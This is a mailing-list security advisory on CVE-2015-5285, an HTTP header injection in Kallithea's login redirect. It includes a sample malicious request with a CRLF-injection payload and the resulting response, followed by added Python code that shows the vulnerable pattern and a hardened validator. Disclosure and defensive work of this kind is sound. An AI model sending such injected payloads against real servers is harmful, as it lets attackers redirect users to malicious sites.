oss-sec mailing list archives
CVE-2015-5285: Kallithea: HTTP header injection
From: Andrew Shadura <andrew () shadura me>
Date: Fri, 2 Oct 2015 22:13:01 +0200
HTTP header injection

Synopsis
========

A vulnerability has been found in Kallithea that allows attackers to inject arbitrary headers into the server response for certain URLs.

Description
===========

HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses. The vulnerability affects the `came_from` `GET` parameter: its value is placed into the `Location` header of the redirect without CR/LF characters being rejected, so a percent-encoded `%0d%0a` sequence terminates the header and everything after it is emitted as further headers.

Example of a malicious request:

GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
</a>; you should be redirected automatically.
 </body>
</html>

Impact
======

The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or making other middleware misbehave when it trusts the response headers.

Resolution
==========

The Kallithea project has fixed this issue in the stable branch. Users are advised to upgrade to the latest 0.3 release.

Affected versions
=================

The issue is present in Kallithea versions before 0.3.

Acknowledgments
===============

Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.

References
==========

[0] Kallithea Project <https://kallithea-scm.org/>
[1] CVE-2015-5285 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>
[2] Kallithea: Security Notice CVE-2015-5285 <https://kallithea-scm.org/security/cve-2015-5285.html>
[3] Mercurial changeset fixing the issue <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] Zero Science Lab <http://www.zeroscience.mk/en/>

-- 
Cheers,
Andrew Shadura
on behalf of Kallithea Security Team
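The `came_from` handling described in the Description section, as an added example that is not Kallithea's code and not the fix referenced in [3]: a naive `Location` builder that shows why an unchecked parameter splits headers, beside a hardened validator that rejects control characters and off-site targets. The function names, `BASE_URL` and the sample paths are hypothetical; the malicious parameter value is the one from the request in the advisory.

```python
import re
from urllib.parse import unquote, urlsplit, urlunsplit

# Hypothetical base for the redirect; chosen to match the advisory's host.
BASE_URL = "http://192.168.0.28:8080/_admin/"

# The came_from value from the advisory's request, still percent-encoded,
# i.e. as it arrives on the wire before the framework decodes it.
ADVISORY_CAME_FROM = ("1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
                      "%01%02%0d%0aLocation%3a%20http://zeroscience.mk")

# Any C0 control character or DEL. CR and LF are what split headers, but no
# other control byte belongs in a redirect target either (the advisory's
# request also carries %01%02).
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def naive_location(base, came_from):
    """Vulnerable pattern: the decoded parameter is pasted straight into the
    header value. An embedded CRLF ends the Location header and the rest of
    the string is emitted as additional headers, as in the advisory."""
    return base + came_from


def sanitize_came_from(came_from, default="/"):
    """Return a same-origin path that is safe to put in a Location header,
    or the default landing page when the value cannot be trusted.

    The control-character check runs on the decoded string *before*
    urlsplit(): recent CPython releases silently strip \\r and \\n inside
    urlsplit(), so parsing first would hide exactly the bytes to reject.
    """
    if not came_from:
        return default
    if CONTROL_CHARS.search(came_from):
        return default
    # Browsers treat a backslash after the leading slash like a second
    # slash, which would turn the value into a protocol-relative URL.
    if "\\" in came_from:
        return default
    parts = urlsplit(came_from)
    # Absolute ("http://...") or protocol-relative ("//host/") targets
    # would redirect the user off-site; only local paths are allowed.
    if parts.scheme or parts.netloc:
        return default
    if not parts.path.startswith("/"):
        return default
    # Rebuild from the parsed parts; the fragment is dropped on purpose.
    return urlunsplit(("", "", parts.path, parts.query, ""))


def hardened_location(base, raw_param):
    """Decode the query parameter as the framework would, then validate it
    before it reaches the header."""
    return base.rstrip("/") + sanitize_came_from(unquote(raw_param))


def has_header_injection(header_value):
    """Detection helper for tests or response logs: True if writing this
    value into a header would produce more than one header line."""
    return "\r" in header_value or "\n" in header_value


if __name__ == "__main__":
    decoded = unquote(ADVISORY_CAME_FROM)
    print("naive:   ", repr(naive_location(BASE_URL, decoded)))
    print("hardened:", repr(hardened_location(BASE_URL, ADVISORY_CAME_FROM)))
```

Rejecting the whole value rather than stripping the offending characters is deliberate: a stripped value still came from an attacker and may have been crafted to survive the cleanup, whereas falling back to the landing page loses nothing for a legitimate user.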